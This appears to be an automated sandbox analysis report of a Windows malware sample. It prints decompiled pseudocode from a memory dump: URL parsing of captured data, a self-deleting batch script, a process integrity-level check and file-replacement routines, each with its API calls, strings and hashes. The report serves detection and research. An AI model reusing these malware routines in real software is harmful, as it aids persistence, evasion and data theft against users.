						if(_t256 == 0) {
							_t252 = _a8;
							L6:
							_t257 = _t282[2];
							_v24 = _v24 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							_t158 = _t257 + _t282[4];
							_v60 = _t158;
							if(_t257 >= _t158) {
								L35:
								_t159 =  *(_t282 - 0x10);
								_t288 = 0;
								if((_t159 & 0x00000008) != 0 && _v24 != 0) {
									if((_t159 & 0x00000200) == 0) {
										_t253 = E00411346(_t159 | 0xffffffff, 0, _a4);
										__eflags = _t253;
										if(_t253 != 0) {
											_t188 = 6;
											E0040CA33(_t188,  &_v124);
											_push(_v24);
											E00410F70(_t257, _t277, __eflags, 0xc9, _t253, 0,  &_v124, _t253);
											_t302 = _t302 + 0x18;
											E00411106(_t253);
										}
									} else {
										_t278 = 0x3c;
										E004111B9( &_v252,  &_v252, 0, _t278);
										_v236 =  &_v552;
										_v252 = _t278;
										_v232 = 0x103;
										if(InternetCrackUrlA(_a4, 0, 0,  &_v252) == 1 && _v232 > 0) {
											GetSystemTime( &_v76);
											_t300 =  &_v140;
											_t199 = 5;
											E0040CA33(_t199,  &_v140);
											_push(_v76.wDay & 0x0000ffff);
											_push(_v76.wMonth & 0x0000ffff);
											_push((_v76.wYear & 0x0000ffff) - 0x7d0);
											_push( &_v552);
											E00411DF9( &_v140, 0x104,  &_v1072, _t300);
											_t302 = _t302 + 0x14;
											E00410E2E(_t257, 0x104, 2, 0,  &_v1072, _v24, _v12);
											_t282 = _v28;
										}
									}
									E00411106(_v24);
									_t288 = 0;
								}
								if( *((intOrPtr*)(_t282 - 4)) != _t288) {
									if(( *(_t282 - 0x10) & 0x00000010) == 0) {
										EnterCriticalSection(0x41eaa4);
										E00411106( *0x41eabc);
										_t168 = E00411564(E00411106( *0x41eac0) | 0xffffffff,  *((intOrPtr*)(_t282 - 0xc)));
										 *0x41eabc = _t168;
										__eflags = _t168 | 0xffffffff;
										 *0x41eac0 = E00411564(_t168 | 0xffffffff,  *((intOrPtr*)(_t282 - 4)));
										LeaveCriticalSection(0x41eaa4);
										goto L51;
									}
									E00406DAC( &_v256, _t257, 1,  &_v184);
									if(E004123AB( &_v272,  *((intOrPtr*)(_t282 - 4)), E00411C43( *((intOrPtr*)(_t282 - 4)))) == 0) {
										goto L51;
									}
									_t259 =  &_v256;
									do {
										E0041146E( *((intOrPtr*)(_t301 + _t288 - 0x10c)), _t259);
										_t288 = _t288 + 1;
										_t259 = _t259 + 4;
									} while (_t288 < 0x10);
									 *_t259 = 0;
									GetLocalTime( &_v288);
									E0041522E(_t259,  &_v184,  &_v256, 3,  &_v288, 0x10);
								}
								goto L51;
							} else {
								goto L9;
								L13:
								_t277 =  *_t211 & 0x0000ffff;
								if(_t277 != 4) {
									_t257 = _t211 + 4;
									_t218 = E00407BFB(_v56, _t211 + 4, 0,  &_v20, _t277 - 4,  *_t252 + _v16,  *_a12 - _v16);
									__eflags = _t218;
									if(_t218 == 0) {
										L33:
										if(_v48 < _v60) {
											_t257 = _v48;
											L9:
											_t211 = _t257 + ( *_t257 & 0x0000ffff);
											_t290 = ( *_t211 & 0x0000ffff) + _t211;
											_v48 = _t290 + ( *_t290 & 0x0000ffff);
											_t277 =  *_t257 & 0x0000ffff;
											_v40 = _t257;
											_v32 = _t211;
											_v36 = _t290;
											if(( *_t257 & 0x0000ffff) != 4) {
												goto L11;
											} else {
												_v16 = _v16 & 0x00000000;
												goto L13;
											}
										}
										_t282 = _v28;
										goto L35;
									}
									__eflags =  *_v40 - 4;
									_t292 = _v36;
									if( *_v40 != 4) {
										_t54 =  &_v20;
										 *_t54 = _v20 + _v16;
										__eflags =  *_t54;
									} else {
										_v16 = _v20;
									}
									L22:
									_t257 = _v20 - _v16;
									_t222 =  *(_v28 - 0x10);
									_t287 = ( *_t292 & 0x0000ffff) - 4;
									_v32 = _t257;
									if((_t222 & 0x00000004) == 0) {
										__eflags = _t222 & 0x00000008;
										if((_t222 & 0x00000008) != 0) {
											_t224 = E00411091(_t257 + _t287 + _v12 + 2,  &_v24);
											__eflags = _t224;
											if(_t224 != 0) {
												_t295 = _v24;
												__eflags = _t287;
												if(_t287 != 0) {
													E00411142(_v12 + _t295,  &(_v36[2]), _t287);
													_t84 =  &_v12;
													 *_t84 = _v12 + _t287;
													__eflags =  *_t84;
												}
												_t277 = _v32;
												_t227 = E00411142(_v12 + _t295,  *_t252 + _v16, _t277);
												_t257 = _v28;
												__eflags =  *(_t257 - 0x10) & 0x00000100;
												if(( *(_t257 - 0x10) & 0x00000100) == 0) {
													_t228 = E00415AE6(_t227, _t277);
													_t95 =  &_v12;
													 *_t95 = _v12 + _t228;
													__eflags =  *_t95;
													_t252 = _a8;
												} else {
													_v12 = _v12 + _t277;
												}
												_t229 = _v12;
												 *((char*)(_t229 + _t295)) = 0xa;
												_t230 = _t229 + 1;
												__eflags = _t230;
												_v12 = _t230;
												 *((char*)(_t230 + _t295)) = 0;
											}
										}
									} else {
										_v40 =  *_a12 - _t257 + _t287;
										_t240 = E004110D6( *_a12 - _t257 + _t287);
										_v32 = _t240;
										if(_t240 != 0) {
											_t277 = _v16;
											_t242 = E00411142(E00411142(_t240,  *_t252, _v16) + _v16,  &(_t292[2]), _t287);
											_t297 = _a12;
											_t257 =  *_t252 + _v20;
											E00411142(_t242 + _t287 + _v16,  *_t252 + _v20,  *_t297 - _v20);
											E00411106( *_t252);
											_v44 = _v44 + 1;
											 *_t252 = _v32;
											 *_t297 = _v40;
										}
									}
									goto L33;
								}
								if( *_t257 != _t277) {
									_t250 = _v16;
								} else {
									_t250 =  *_a12;
								}
								_v20 = _t250;
								goto L22;
								L11:
								_t215 = E00407BFB(_v56, _t257,  &_v16, 0, _t277 - 4,  *_t252,  *_a12);
								__eflags = _t215;
								if(_t215 == 0) {
									goto L33;
								}
								_t257 = _v40;
								_t292 = _v36;
								_t211 = _v32;
								goto L13;
							}
						}
						_v120 = 0x2a3f;
						_v116 = _t256;
						_t160 = E00411C43(_t256);
						_t252 = _a8;
						_v112 = _t160;
						_v108 =  *_t252;
						_t277 = _t277 | 0x00000012;
						_v104 =  *_a12;
						_v92 = _t277;
						if(E0041208A( &_v120) != 0) {
							goto L6;
						}
						L51:
						_t282 =  &(_t282[0xe]);
						_t150 =  &_v52;
						 *_t150 = _v52 - 1;
						_v28 = _t282;
					} while ( *_t150 != 0);
					goto L52;
				}
			}

0x00408a25
0x00408a2e
0x00408e66
0x00408e6c
0x00408e73
0x00408a34
0x00408a34
0x00408a37
0x00408a3a
0x00408a3d
0x00408a40
0x00408a45
0x00408a48
0x00408a4d
0x00408a88
0x00408a8b
0x00408a8b
0x00408a91
0x00408a95
0x00408a99
0x00408a9b
0x00408aa0
0x00408c67
0x00408c67
0x00408c6a
0x00408c6e
0x00408c82
0x00408d48
0x00408d4a
0x00408d4c
0x00408d53
0x00408d54
0x00408d59
0x00408d68
0x00408d6d
0x00408d71
0x00408d71
0x00408c88
0x00408c8a
0x00408c94
0x00408c9f
0x00408cb1
0x00408cb7
0x00408cca
0x00408ce0
0x00408ce8
0x00408cee
0x00408cef
0x00408cf8
0x00408cfd
0x00408d07
0x00408d0e
0x00408d1d
0x00408d22
0x00408d32
0x00408d37
0x00408d37
0x00408cca
0x00408d79
0x00408d7e
0x00408d7e
0x00408d83
0x00408d8d
0x00408e14
0x00408e20
0x00408e36
0x00408e3b
0x00408e43
0x00408e4c
0x00408e51
0x00000000
0x00408e51
0x00408d9e
0x00408dbb
0x00000000
0x00000000
0x00408dc1
0x00408dc7
0x00408dce
0x00408dd3
0x00408dd4
0x00408dd7
0x00408dde
0x00408de8
0x00408e07
0x00408e07
0x00000000
0x00408aa6
0x00408aa6
0x00408b00
0x00408b00
0x00408b06
0x00408b34
0x00408b3a
0x00408b3f
0x00408b41
0x00408c58
0x00408c5e
0x00408aa8
0x00408aab
0x00408aae
0x00408ab3
0x00408aba
0x00408abd
0x00408ac0
0x00408ac3
0x00408ac6
0x00408acc
0x00000000
0x00408ace
0x00408ace
0x00000000
0x00408ace
0x00408acc
0x00408c64
0x00000000
0x00408c64
0x00408b4a
0x00408b4e
0x00408b51
0x00408b5e
0x00408b5e
0x00408b5e
0x00408b53
0x00408b56
0x00408b56
0x00408b61
0x00408b6a
0x00408b6d
0x00408b70
0x00408b73
0x00408b78
0x00408bdf
0x00408be1
0x00408bef
0x00408bf4
0x00408bf6
0x00408bf8
0x00408bfb
0x00408bfd
0x00408c0d
0x00408c12
0x00408c12
0x00408c12
0x00408c12
0x00408c17
0x00408c25
0x00408c2a
0x00408c2d
0x00408c34
0x00408c3e
0x00408c43
0x00408c43
0x00408c43
0x00408c46
0x00408c36
0x00408c36
0x00408c36
0x00408c49
0x00408c4c
0x00408c50
0x00408c50
0x00408c51
0x00408c54
0x00408c54
0x00408bf6
0x00408b7a
0x00408b83
0x00408b86
0x00408b8b
0x00408b90
0x00408b96
0x00408bab
0x00408bb0
0x00408bbd
0x00408bc4
0x00408bcb
0x00408bd3
0x00408bd6
0x00408bdb
0x00408bdb
0x00408b90
0x00000000
0x00408b78
0x00408b0b
0x00408b14
0x00408b0d
0x00408b10
0x00408b10
0x00408b17
0x00000000
0x00408ad4
0x00408aea
0x00408aef
0x00408af1
0x00000000
0x00000000
0x00408af7
0x00408afa
0x00408afd
0x00000000
0x00408afd
0x00408aa0
0x00408a4f
0x00408a55
0x00408a58
0x00408a5d
0x00408a60
0x00408a65
0x00408a6d
0x00408a73
0x00408a76
0x00408a80
0x00000000
0x00408a86
0x00408e57
0x00408e57
0x00408e5a
0x00408e5a
0x00408e5d
0x00408e5d
0x00000000
0x00408a3d

APIs

InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 00408CC1
GetSystemTime.KERNEL32(?), ref: 00408CE0
GetLocalTime.KERNEL32(?,?,?,00000000,00000001,?), ref: 00408DE8
EnterCriticalSection.KERNEL32(0041EAA4), ref: 00408E14
LeaveCriticalSection.KERNEL32(0041EAA4,00000000,?), ref: 00408E51

Strings

?*, xrefs: 00408A4F

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: CriticalSectionTime$CrackEnterInternetLeaveLocalSystem
String ID: ?*
API String ID: 2400141425-3267162389
Opcode ID: 77640a6e9717e3573cd5425ec82b8bd857a03d920a0eb10a52e76367dd35d802
Instruction ID: aaa1df131d7b30b29749126411739104fdf5366701180ffaec2c7863ade85a5e
Opcode Fuzzy Hash: 77640a6e9717e3573cd5425ec82b8bd857a03d920a0eb10a52e76367dd35d802
Instruction Fuzzy Hash: D3E18D71D00219AFDF10DFA9C980AEEB7B5FF48304F10456AE955B7291D738AA81CF68

Uniqueness

Uniqueness Score: -1.00%

Function 004108E5, Relevance: 10.7, APIs: 7, Instructions: 220
filestringsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E004108E5(signed int __ecx, short _a4) {
				char _v268;
				signed short _v300;
				char _v646;
				signed int _v940;
				char _v1012;
				short _v1532;
				short _v1536;
				signed int _v1540;
				short _v1544;
				void* _v1548;
				intOrPtr _v1552;
				intOrPtr _v1556;
				char _v1560;
				signed int _v1568;
				WCHAR* _v1572;
				signed int _v1576;
				long _v1580;
				signed int _v1584;
				signed int _v1585;
				void* __ebx;
				void* __esi;
				signed int _t61;
				void* _t62;
				signed int _t70;
				signed int _t72;
				unsigned int _t74;
				signed int _t81;
				signed int _t84;
				long _t85;
				long _t86;
				signed int _t90;
				signed int _t102;
				signed int _t111;
				signed int _t114;
				struct _SECURITY_ATTRIBUTES* _t125;
				WCHAR* _t132;
				short _t136;
				void* _t139;
				void* _t143;
				signed int _t144;

				_t133 = __ecx;
				_t136 = _a4;
				_t125 = 0;
				_push(2);
				if( *(_t136 + 0x330) == 0) {
					_push(0xcd9508fd);
				} else {
					_t151 =  *_t136;
					_push(((0 |  *_t136 != 0x00000000) - 0x00000001 & 0xa3e26067) + 0x93f52fc5);
				}
				_t61 = E004069FD(_t133, _t151);
				_v1584 = _t61;
				if(_t61 != _t125) {
					_t62 =  *0x41ea9c; // 0x0
					_v1548 = _t62;
					_v1544 =  &_v268;
					_v1556 = E00410741;
					_v1552 = E0041087D;
					_v1536 = _t136;
					E00406C9C( &_v1012);
					E00411142( &_v268,  &_v646, 0x102);
					_t70 = ( *_t136 & 0x000000ff) - _t125;
					__eflags = _t70;
					if(_t70 == 0) {
						_t72 = _v300 >> 0x10;
						__eflags = _t72;
						_v1580 = _t72;
						_v1584 = _v300 & 0x0000ffff;
						L10:
						_t74 = _v1580;
						L11:
						_v1580 = _t74 * 0xea60;
						_v1584 = _v1584 * 0xea60;
						E004111B9( &_v1012,  &_v1012, _t125, 0x2e8);
						_v1544 = 0;
						_t81 = E00406B23();
						__eflags = _t81;
						if(_t81 == 0) {
							L39:
							E004147B3(_v1576);
							_t139 = 0;
							goto L5;
						} else {
							goto L12;
						}
						do {
							L12:
							_v1585 = 1;
							__eflags =  *_t136 - _t125;
							if( *_t136 != _t125) {
								L27:
								_t84 = E004091CB();
								_t141 = _t84;
								__eflags = _t84;
								if(__eflags != 0) {
									_v1572 = E00416A93(0, _t134, __eflags, _t141, 0x4e23, 0x10000000);
									E00411106(_t141);
									__eflags = _v1576;
									if(_v1576 != 0) {
										_v1540 = _v1540 & 0;
										__eflags = E004104D7(_t133, _t134,  &_v1540, 1);
										if(__eflags != 0) {
											 *(_t136 + 8) =  *(_t136 + 8) | 0xffffffff;
											_t111 = E00410D30( &_v1560, _t133, __eflags);
											__eflags = _t111;
											_t114 = (_t111 & 0xffffff00 | _t111 != 0x00000000) - 0x00000001 & 0x00000002;
											__eflags = _t114;
											_v1585 = _t114;
											E00416EC0(_t136 + 8);
											E00411106(_v1540);
										}
									}
									E00411106(_v1560);
								}
								L32:
								_t125 = 0;
								__eflags =  *(_t136 + 0x330);
								if( *(_t136 + 0x330) == 0) {
									goto L39;
								}
								goto L33;
							}
							asm("sbb ebx, ebx");
							E00410396( !( ~(_v1532 & 0x0000ffff)) &  &_v1532, _t133, 0);
							_t132 = _t136 + 0x122;
							_t90 = GetFileAttributesW( &_v1536);
							__eflags = _t90 - 0xffffffff;
							if(_t90 == 0xffffffff) {
								_t90 = GetFileAttributesW(0x41ec80);
								__eflags = _t90 - 0xffffffff;
								if(_t90 == 0xffffffff) {
									goto L32;
								}
								_t133 = 0x41ec80;
								L17:
								_t134 = _t132;
								E004114A7(_t90 | 0xffffffff, _t133, _t134);
								_t143 = CreateFileW(_t132, 0x80000000, 7, 0, 3, 0, 0);
								__eflags = _t143 - 0xffffffff;
								if(_t143 == 0xffffffff) {
									L35:
									E0041621B(_t132);
									goto L32;
								}
								_v1576 = E004161F4(_t133, _t143);
								_v1572 = _t134;
								CloseHandle(_t143);
								__eflags = _v1576 - 0xffffffff;
								if(_v1576 != 0xffffffff) {
									L20:
									__eflags = _v1568;
									if(__eflags > 0) {
										goto L35;
									}
									if(__eflags < 0) {
										L23:
										__eflags = lstrcmpiW(_t132,  &_v1532);
										if(__eflags == 0) {
											goto L27;
										}
										_t144 = E004069FD(_t133, __eflags, 0x404a9f61, 2);
										__eflags = _t144;
										if(_t144 == 0) {
											goto L32;
										}
										_t102 = MoveFileExW(_t132,  &_v1532, 0xb);
										__eflags = _t102;
										if(_t102 == 0) {
											goto L32;
										}
										E004147B3(_t144);
										__eflags = _t102 | 0xffffffff;
										_t133 =  &_v1536;
										_t134 = _t132;
										E004114A7(_t102 | 0xffffffff,  &_v1536, _t132);
										goto L27;
									}
									__eflags = _v1572 - 0xffffffff;
									if(_v1572 > 0xffffffff) {
										goto L35;
									}
									goto L23;
								}
								__eflags = _v1568;
								if(_v1568 == 0) {
									goto L35;
								}
								goto L20;
							}
							_t133 =  &_v1532;
							goto L17;
							L33:
							__eflags = _v1585 - 2;
							if(_v1585 != 2) {
								_t85 = _v1580;
								__eflags = _v1585;
								if(_v1585 != 0) {
									_t85 = 0x7530;
								}
							} else {
								_t85 = _v1584;
							}
							_t86 = WaitForSingleObject( *0x41ea9c, _t85);
							__eflags = _t86 - 0x102;
						} while (_t86 == 0x102);
						goto L39;
					}
					__eflags = _t70 != 1;
					if(_t70 != 1) {
						goto L10;
					} else {
						_t133 = _v940 & 0x0000ffff;
						_t74 = _v940 >> 0x10;
						_v1584 = _v940 & 0x0000ffff;
						goto L11;
					}
				} else {
					_t139 = 1;
					L5:
					E00411106(_t136);
					return _t139;
				}
			}

0x004108e5
0x004108f4
0x004108f7
0x004108f9
0x00410901
0x00410918
0x00410903
0x00410905
0x00410915
0x00410915
0x0041091d
0x00410922
0x00410928
0x0041093e
0x00410943
0x0041094e
0x00410959
0x00410961
0x00410969
0x0041096d
0x00410987
0x0041098f
0x0041098f
0x00410991
0x004109b5
0x004109b5
0x004109b8
0x004109c4
0x004109c8
0x004109c8
0x004109cc
0x004109d2
0x004109e5
0x004109f2
0x004109f9
0x004109fe
0x00410a03
0x00410a05
0x00410bd6
0x00410bda
0x00410bdf
0x00000000
0x00000000
0x00000000
0x00000000
0x00410a0b
0x00410a0b
0x00410a0b
0x00410a10
0x00410a12
0x00410b1c
0x00410b1c
0x00410b21
0x00410b23
0x00410b25
0x00410b3a
0x00410b3e
0x00410b43
0x00410b47
0x00410b49
0x00410b59
0x00410b5b
0x00410b60
0x00410b67
0x00410b6c
0x00410b73
0x00410b73
0x00410b75
0x00410b79
0x00410b82
0x00410b82
0x00410b5b
0x00410b8b
0x00410b8b
0x00410b90
0x00410b90
0x00410b92
0x00410b98
0x00000000
0x00000000
0x00000000
0x00410b98
0x00410a1f
0x00410a2b
0x00410a3b
0x00410a41
0x00410a43
0x00410a46
0x00410a53
0x00410a55
0x00410a58
0x00000000
0x00000000
0x00410a5e
0x00410a63
0x00410a66
0x00410a68
0x00410a82
0x00410a84
0x00410a87
0x00410ba7
0x00410ba8
0x00000000
0x00410ba8
0x00410a94
0x00410a98
0x00410a9c
0x00410aa2
0x00410aa7
0x00410ab4
0x00410ab4
0x00410ab9
0x00000000
0x00000000
0x00410abf
0x00410acc
0x00410ad8
0x00410ada
0x00000000
0x00000000
0x00410ae8
0x00410aea
0x00410aec
0x00000000
0x00000000
0x00410afa
0x00410b00
0x00410b02
0x00000000
0x00000000
0x00410b09
0x00410b0e
0x00410b11
0x00410b15
0x00410b17
0x00000000
0x00410b17
0x00410ac1
0x00410ac6
0x00000000
0x00000000
0x00000000
0x00410ac6
0x00410aa9
0x00410aae
0x00000000
0x00000000
0x00000000
0x00410aae
0x00410a48
0x00000000
0x00410b9a
0x00410b9a
0x00410b9f
0x00410baf
0x00410bb3
0x00410bb7
0x00410bb9
0x00410bb9
0x00410ba1
0x00410ba1
0x00410ba1
0x00410bc5
0x00410bcb
0x00410bcb
0x00000000
0x00410a0b
0x00410993
0x00410994
0x00000000
0x00410996
0x00410996
0x004109a5
0x004109a8
0x00000000
0x004109a8
0x0041092a
0x0041092c
0x0041092d
0x0041092e
0x0041093b
0x0041093b

APIs

GetFileAttributesW.KERNEL32(?,00000000,?,00000000,000002E8,?,?,00000102), ref: 00410A41
GetFileAttributesW.KERNEL32(0041EC80), ref: 00410A53
CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00410A7C
CloseHandle.KERNEL32(00000000,00000000), ref: 00410A9C
lstrcmpiW.KERNEL32(?,?), ref: 00410AD2
MoveFileExW.KERNEL32(?,?,0000000B,404A9F61,00000002), ref: 00410AFA
WaitForSingleObject.KERNEL32(?,?,00000000,000002E8,?,?,00000102), ref: 00410BC5

Part of subcall function 0041621B: SetFileAttributesW.KERNEL32(00000080,00000080,00418BFB,?), ref: 00416224
Part of subcall function 0041621B: DeleteFileW.KERNEL32(?), ref: 0041622E

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: File$Attributes$CloseCreateDeleteHandleMoveObjectSingleWaitlstrcmpi
String ID:
API String ID: 2659724836-0
Opcode ID: 4acc7dcb9d70a8efcb66f20cc0f26d8c0f2615cf471acdd8f1d53ea4a5630f9b
Instruction ID: cde1777e5d6a8032b97940991e31f3e7693a02ee78bee4335ed559b846239d4c
Opcode Fuzzy Hash: 4acc7dcb9d70a8efcb66f20cc0f26d8c0f2615cf471acdd8f1d53ea4a5630f9b
Instruction Fuzzy Hash: CB71E3715083419AD320DFB4CC81AEBBBE4AF45358F100A2FF595E62A2D778D9C4C79A

Uniqueness

Uniqueness Score: -1.00%

Function 00412BC6, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00412BC6(void* __ebx, void* __edi, char _a4) {
				short _v24;
				intOrPtr _v28;
				char _v72;
				short _v592;
				char _v852;
				char _v1392;
				void* _t35;
				char _t56;

				if(E0041623C(L"bat",  &_v592) == 0) {
					L7:
					return 0;
				}
				CharToOemW( &_v592,  &_v852);
				_push( &_v852);
				if(E00411ECA( &_a4, "@echo off\r\n%s\r\ndel /F \"%s\"\r\n", _a4) == 0xffffffff) {
					L6:
					E0041621B( &_v592);
					goto L7;
				}
				_t35 = E00416070( &_v592, _a4, _t31);
				E00411106(_a4);
				if(_t35 == 0) {
					goto L6;
				}
				_push(__edi);
				_push( &_v592);
				if(E00411DF9( &_v592, 0x10e,  &_v1392,  &M0040451C) <= 0xffffffff || GetEnvironmentVariableW(L"ComSpec",  &_v592, 0x104) - 1 > 0x102) {
					goto L6;
				} else {
					_t56 = 0x44;
					E004111B9( &_v72,  &_v72, 0, _t56);
					_v24 = 0;
					_v72 = _t56;
					_v28 = 1;
					return E004129CD( &_v592,  &_v1392, 0,  &_v72, 0) & 0xffffff00 | _t48 != 0x00000000;
				}
			}

0x00412be2
0x00412cd4
0x00000000
0x00412cd4
0x00412bf6
0x00412c02
0x00412c1a
0x00412cc8
0x00412ccf
0x00000000
0x00412ccf
0x00412c2c
0x00412c36
0x00412c3e
0x00000000
0x00000000
0x00412c44
0x00412c4b
0x00412c67
0x00000000
0x00412c88
0x00412c8a
0x00412c92
0x00412c9a
0x00412cb2
0x00412cb5
0x00000000
0x00412cc3

APIs

Part of subcall function 0041623C: GetTempPathW.KERNEL32(000000F6,?), ref: 00416253

CharToOemW.USER32 ref: 00412BF6

Part of subcall function 00416070: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,+A,004162AF,00000001,00000000,00000000,+A,?), ref: 0041608A
Part of subcall function 00416070: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 004160AD
Part of subcall function 00416070: CloseHandle.KERNEL32(00000000), ref: 004160BA

Part of subcall function 00411106: HeapFree.KERNEL32(00000000,00000000,004128FD,00000000,?,?,?,0040628D,00000000,0040675B), ref: 00411119

GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 00412C7A

Strings

/c "%s", xrefs: 00412C4C
ComSpec, xrefs: 00412C75
@echo off%sdel /F "%s", xrefs: 00412C09
bat, xrefs: 00412BD6

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: File$CharCloseCreateEnvironmentFreeHandleHeapPathTempVariableWrite
String ID: /c "%s"$@echo off%sdel /F "%s"$ComSpec$bat
API String ID: 1639923935-3344086482
Opcode ID: 1c7a324f8f4a74ccbeab4c657a80be9a4363ddaafb707f3c261a8d506b899358
Instruction ID: 82ea3152fa0d3881ef5ff950779b7ed3397b8e81fa1a0c2d04cc2355d8176a93
Opcode Fuzzy Hash: 1c7a324f8f4a74ccbeab4c657a80be9a4363ddaafb707f3c261a8d506b899358
Instruction Fuzzy Hash: F92180B194110C6ADB10EBA4DD46FEF77BCEB04314F2041A7B708E3191E6789AD58BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041285A, Relevance: 10.6, APIs: 7, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0041285A(void* __ecx) {
				long _v8;
				void* _v12;
				char* _t21;
				signed char _t22;
				DWORD* _t25;
				void* _t32;

				_t28 = 0;
				if(OpenProcessToken(0xffffffff, 8,  &_v12) == 0) {
					L14:
					return _t28;
				}
				if(GetTokenInformation(_v12, 0x19, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L13:
					CloseHandle(_v12);
					goto L14;
				} else {
					_t32 = E004110D6(_v8);
					if(_t32 == 0) {
						L12:
						goto L13;
					}
					if(GetTokenInformation(_v12, 0x19, _t32, _v8,  &_v8) != 0) {
						_t21 = GetSidSubAuthorityCount( *_t32);
						if(_t21 != 0) {
							_t22 =  *_t21;
							if(_t22 > 0) {
								_t25 = GetSidSubAuthority( *_t32, (_t22 & 0x000000ff) - 1);
								if(_t25 != 0) {
									if( *_t25 >= 0x2000) {
										asm("sbb bl, bl");
										_t28 = 3;
									} else {
										_t28 = 1;
									}
								}
							}
						}
					}
					E00411106(_t32);
					goto L12;
				}
			}

0x00412868
0x00412872
0x00412908
0x0041290c
0x0041290c
0x0041288e
0x004128fe
0x00412901
0x00000000
0x0041289b
0x004128a4
0x004128a8
0x004128fd
0x00000000
0x004128fd
0x004128bb
0x004128bf
0x004128c7
0x004128c9
0x004128cd
0x004128d6
0x004128de
0x004128e7
0x004128f2
0x004128f4
0x004128e9
0x004128e9
0x004128e9
0x004128e7
0x004128de
0x004128cd
0x004128c7
0x004128f8
0x00000000
0x004128f8

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,?,00000000,?,?,?,0040628D,00000000,0040675B,?,?,00000000), ref: 0041286A
GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,00000000,00000000,74B04EE0,?,?,?,0040628D,00000000,0040675B,?,?,00000000), ref: 0041288A
GetLastError.KERNEL32(?,?,?,0040628D,00000000,0040675B,?,?,00000000), ref: 00412890
GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?,?,?,0040628D,00000000,0040675B,?,?,00000000), ref: 004128B7
GetSidSubAuthorityCount.ADVAPI32(00000000,?,?,?,0040628D,00000000,0040675B,?,?,00000000), ref: 004128BF
GetSidSubAuthority.ADVAPI32(00000000,?,?,?,?,0040628D,00000000,0040675B,?,?,00000000), ref: 004128D6
CloseHandle.KERNEL32(?,?,?,?,0040628D,00000000,0040675B,?,?,00000000), ref: 00412901

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: Token$AuthorityInformation$CloseCountErrorHandleLastOpenProcess
String ID:
API String ID: 3714493844-0
Opcode ID: 2b9835b24c31ae79a5050f280b9a39d1bff0a6a922435733b02089df75e8647b
Instruction ID: 4fd659553589e02be29fed0e3ff492cc7c88977c02e97eeb6d8eeb53a6d40a5e
Opcode Fuzzy Hash: 2b9835b24c31ae79a5050f280b9a39d1bff0a6a922435733b02089df75e8647b
Instruction Fuzzy Hash: 48118E31A00148BFEB106B94CE84EEE3B7DEB05350F100166F541E6160D7B99ED5EB28

Uniqueness

Uniqueness Score: -1.00%

Function 00407A1F, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00407A1F(void* _a4, char _a8) {
				char _v40;
				char _v160;
				char _v680;
				void* __edi;
				void* __esi;
				void** _t11;
				void* _t17;
				void* _t19;
				void* _t24;
				void* _t29;
				void* _t31;
				WCHAR* _t35;

				_t11 =  &_a4;
				_t29 = 0;
				__imp__ConvertSidToStringSidW(_a4, _t11);
				if(_t11 != 0) {
					_t38 =  &_v160;
					E0040CA33(1,  &_v160);
					_push(_a4);
					_t35 =  &_v680;
					_t17 = E00411DF9(_t38, 0x104, _t35, _t38);
					_pop(_t31);
					if(_t17 > 0) {
						_t19 = 2;
						E0040CA33(_t19,  &_v40);
						_t24 = E004150D3(0x80000002, _t31, _t35, _t35,  &_v40, 0x104);
						if(_t24 != 0 && _t24 != 0xffffffff) {
							PathUnquoteSpacesW(_t35);
							_t8 =  &_a8; // 0x405624
							ExpandEnvironmentStringsW(_t35,  *_t8, 0x104);
							asm("sbb bl, bl");
							_t29 = 1;
						}
					}
					LocalFree(_a4);
				}
				return _t29;
			}

0x00407a29
0x00407a30
0x00407a32
0x00407a3a
0x00407a44
0x00407a4b
0x00407a50
0x00407a5b
0x00407a61
0x00407a67
0x00407a6a
0x00407a71
0x00407a72
0x00407a89
0x00407a90
0x00407a9a
0x00407aa1
0x00407aa7
0x00407ab3
0x00407ab5
0x00407ab5
0x00407a90
0x00407aba
0x00407ac1
0x00407ac6

APIs

ConvertSidToStringSidW.ADVAPI32(?,?), ref: 00407A32
LocalFree.KERNEL32(?,.exe,00000000), ref: 00407ABA

Part of subcall function 004150D3: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00407A8E,?,?,00000104,.exe,00000000), ref: 004150E8

PathUnquoteSpacesW.SHLWAPI(?,?,?,00000104,.exe,00000000), ref: 00407A9A
ExpandEnvironmentStringsW.KERNEL32(?,$V@,00000104), ref: 00407AA7

Strings

$V@, xrefs: 00407AA1
.exe, xrefs: 00407A43

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

